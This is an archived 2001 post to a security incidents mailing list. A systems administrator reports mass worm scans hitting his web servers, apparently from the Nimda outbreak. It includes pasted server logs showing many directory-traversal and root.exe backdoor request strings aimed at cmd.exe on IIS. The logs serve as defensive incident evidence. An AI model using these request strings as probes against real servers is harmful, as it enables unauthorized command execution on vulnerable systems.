massive cmd.exe and root.exe attempts

From: Patrick Beam (pbeam@agea.com)
Date: 09/18/01

• Previous message: Dan Jones: "Re: New "concept" virus/worm?"
• Next in thread: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
• Reply: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: "Patrick Beam" <pbeam@agea.com>
To: <incidents@securityfocus.com>
Subject: massive cmd.exe and root.exe attempts
Date: Tue, 18 Sep 2001 12:05:55 -0500
Message-ID: <000801c14064$2e33ab90$958e36d8@ageacorp.net>

I am as well being hit by this worm. Everything seems to be coming from
the same class A 64.*. I have already seen 1500 plus scans to my web
servers and that number is climbing rather fast. This seemed to
suddenly pop up with little or no warning? In the past days I have seen
a few scans here and there but nothing of this magnitude I am wondering
what suddenly changed to cause this type of outbreak?

2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 –

Patrick Beam
Senior Systems Administrator
Agea Corp.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

---

• Previous message: Dan Jones: "Re: New "concept" virus/worm?"
• Next in thread: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
• Reply: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages RE: [Full-Disclosure] Re: new msblaster on the loose? ... If it exploits the same vulnerability, won't it be LESS effective since many people have been hit and thus patched their systems? ... Wouldn't an effective blaster variant find a different loophole? ... and the new variety may double this number. ... that this worm is any different than the first one in those cases, ... (Full-Disclosure) RE: "Code Red" worm questions ... but from other research we think the worm only tries to attack ... > This list is provided by the SecurityFocus ARIS analyzer service. ... > For more information on this free incident handling, management ... > and tracking system please see: ... (Incidents) RE: disinfection tool ... > Perhaps a very controversial viewpoint is using the backdoor installed by the ... > copycat code red worm to patch these systems. ... > This list is provided by the SecurityFocus ARIS analyzer service. ... (Incidents) Re: New version of SirCam ===w32Goner ... This mass mailing worm attempts to send itself using ... The worm copies itself into the WINDOWS SYSTEM folder ... Restart Windows in Safe Mode (reboot your computer, ... Type GONE.SCR and hit ENTER ... (Incidents) RE: [Full-Disclosure] [Fwd: [TH-research] Dumaru.J/Y Worm - Possible Outbreak] ... Also, why we have a significant problem with nomenclature AV wise in general, these days I have a problem with calling a mass mailer a worm. ... This worm is a possible outbreak, how serious is not yet clear. ... Windows System directory as both l32x.exe and vxd32v.exe. ... the Trojan Horses Research mailing list. ... (Full-Disclosure)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > incidents  > 2001-09